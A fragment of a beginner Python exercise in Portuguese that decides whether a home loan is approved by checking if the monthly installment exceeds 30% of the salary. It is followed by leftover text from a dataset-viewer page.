if v / (qa* 12) >= s * 0.3:
print('Seu empréstimo foi negado, sinto muito')
else:
print('Seu empréstimo foi aprovado, parabéns!!')
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.